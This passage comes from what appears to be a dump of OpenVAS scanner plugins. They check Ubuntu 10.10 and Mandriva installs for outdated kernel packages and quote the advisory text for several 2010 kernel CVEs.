isdpkgvuln(pkg:\"md-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-14T19:04:41", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-01-04T00:00:00", "type": "openvas", "title": "Mandriva Update for kernel MDVSA-2010:257 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2963", "CVE-2010-3850", "CVE-2010-3442", "CVE-2010-3848", "CVE-2010-2240", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-3849"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310831290", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831290", "sourceData": "# Copyright (C) 2011 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2010-12/msg00018.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831290\");\n script_version(\"2020-03-13T10:06:41+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 10:06:41 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-01-04 09:11:34 +0100 (Tue, 04 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"MDVSA\", value:\"2010:257\");\n script_cve_id(\"CVE-2010-2240\", \"CVE-2010-3858\", \"CVE-2010-2963\", \"CVE-2010-3067\", \"CVE-2010-3442\", \"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\");\n script_name(\"Mandriva Update for kernel MDVSA-2010:257 (kernel)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2009\\.0)\");\n script_tag(name:\"affected\", value:\"kernel on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"A vulnerability was discovered and corrected in the Linux 2.6 kernel:\n\n The setup_arg_pages function in fs/exec.c in the Linux kernel before\n 2.6.36, when CONFIG_STACK_GROWSDOWN is used, does not properly restrict\n the stack memory consumption of the (1) arguments and (2) environment\n for a 32-bit application on a 64-bit platform, which allows local\n users to cause a denial of service (system crash) via a crafted exec\n system call, a related issue to CVE-2010-2240. (CVE-2010-3858)\n\n drivers/media/video/v4l2-compat-ioctl32.c in the Video4Linux (V4L)\n implementation in the Linux kernel before 2.6.36 on 64-bit platforms\n does not validate the destination of a memory copy operation, which\n allows local users to write to arbitrary kernel memory locations,\n and consequently gain privileges, via a VIDIOCSTUNER ioctl call on a\n /dev/video device, followed by a VIDIOCSMICROCODE ioctl call on this\n device. (CVE-2010-2963)\n\n Integer overflow in the do_io_submit function in fs/aio.c in the\n Linux kernel before 2.6.36-rc4-next-20100915 allows local users to\n cause a denial of service or possibly have unspecified other impact\n via crafted use of the io_submit system call. (CVE-2010-3067)\n\n Multiple integer overflows in the snd_ctl_new function\n in sound/core/control.c in the Linux kernel before\n 2.6.36-rc5-next-20100929 allow local users to cause a denial of\n service (heap memory corruption) or possibly have unspecified\n other impact via a crafted (1) SNDRV_CTL_IOCTL_ELEM_ADD or (2)\n SNDRV_CTL_IOCTL_ELEM_REPLACE ioctl call. (CVE-2010-3442)\n\n A kernel stack overflow, a bad pointer dereference and a missing\n permission check were corrected in the econet implementation\n (CVE-2010-3848) (CVE-2010-3849) (CVE-2010-3850).\n\n Additionally, the kernel has been updated to the stable upstream\n version 2.6.27.56.\n\n To update your kernel, please follow the directions in the referenced links.\");\n\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/security/kernelupdate\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"MNDK_mes5\") {\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel\", rpm:\"drm-experimental-kernel~2.6.27.56~desktop~1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"drm-experimental-kernel-2.6.27.56-desktop586-1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel-2.6.27.56-server-1mnb\", rpm:\"drm-experimental-kernel-2.6.27.56-server-1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel-desktop586-latest\", rpm:\"drm-experimental-kernel-desktop586-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel-desktop-latest\", rpm:\"drm-experimental-kernel-desktop-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel-server-latest\", rpm:\"drm-experimental-kernel-server-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-2.6.27.56-desktop-1mnb\", rpm:\"fglrx-kernel-2.6.27.56-desktop-1mnb~8.522~3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"fglrx-kernel-2.6.27.56-desktop586-1mnb~8.522~3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-2.6.27.56-server-1mnb\", rpm:\"fglrx-kernel-2.6.27.56-server-1mnb~8.522~3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-desktop586-latest\", rpm:\"fglrx-kernel-desktop586-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-desktop-latest\", rpm:\"fglrx-kernel-desktop-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-server-latest\", rpm:\"fglrx-kernel-server-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-2.6.27.56-desktop-1mnb\", rpm:\"iscsitarget-kernel-2.6.27.56-desktop-1mnb~0.4.16~4.1mdvmes5.1\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"iscsitarget-kernel-2.6.27.56-desktop586-1mnb~0.4.16~4.1mdvmes5.1\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-2.6.27.56-server\", rpm:\"iscsitarget-kernel-2.6.27.56-server~1mnb~0.4.16~4.1mdvmes5.1\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-desktop586-latest\", rpm:\"iscsitarget-kernel-desktop586-latest~0.4.16~1.20101216.4.1mdvmes5.1\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-desktop-latest\", rpm:\"iscsitarget-kernel-desktop-latest~0.4.16~1.20101216.4.1mdvmes5.1\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-server-latest\", rpm:\"iscsitarget-kernel-server-latest~0.4.16~1.20101216.4.1mdvmes5.1\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop586\", rpm:\"kernel-desktop586~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop586-devel\", rpm:\"kernel-desktop586-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop586-devel-latest\", rpm:\"kernel-desktop586-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop586-latest\", rpm:\"kernel-desktop586-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel-latest\", rpm:\"kernel-desktop-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-latest\", rpm:\"kernel-desktop-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-server\", rpm:\"kernel-server~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-server-devel\", rpm:\"kernel-server-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-server-devel-latest\", rpm:\"kernel-server-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-server-latest\", rpm:\"kernel-server-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-latest\", rpm:\"kernel-source-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel\", rpm:\"kqemu-kernel~2.6.27.56~desktop~1mnb~1.4.0pre1~0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"kqemu-kernel-2.6.27.56-desktop586-1mnb~1.4.0pre1~0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel-2.6.27.56-server~1mnb\", rpm:\"kqemu-kernel-2.6.27.56-server~1mnb~1.4.0pre1~0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel-desktop586-latest\", rpm:\"kqemu-kernel-desktop586-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel-desktop-latest\", rpm:\"kqemu-kernel-desktop-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel-server-latest\", rpm:\"kqemu-kernel-server-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libafs-kernel\", rpm:\"libafs-kernel~2.6.27.56~desktop~1mnb~1.4.7~5.2mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libafs-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"libafs-kernel-2.6.27.56-desktop586-1mnb~1.4.7~5.2mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libafs-kernel-2.6.27.56-server-1mnb\", rpm:\"libafs-kernel-2.6.27.56-server-1mnb~1.4.7~5.2mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libafs-kernel-desktop586-latest\", rpm:\"libafs-kernel-desktop586-latest~1.4.7~1.20101216.5.2mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libafs-kernel-desktop-latest\", rpm:\"libafs-kernel-desktop-latest~1.4.7~1.20101216.5.2mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libafs-kernel-server-latest\", rpm:\"libafs-kernel-server-latest~1.4.7~1.20101216.5.2mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel\", rpm:\"madwifi-kernel~2.6.27.56~desktop~1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"madwifi-kernel-2.6.27.56-desktop586-1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel-2.6.27.56-server\", rpm:\"madwifi-kernel-2.6.27.56-server~1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel-desktop586-latest\", rpm:\"madwifi-kernel-desktop586-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel-desktop-latest\", rpm:\"madwifi-kernel-desktop-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"madwifi-kernel-server-latest\", rpm:\"madwifi-kernel-server-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel\", rpm:\"nvidia173-kernel~2.6.27.56~desktop~1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia173-kernel-2.6.27.56-desktop586-1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel-desktop586-latest\", 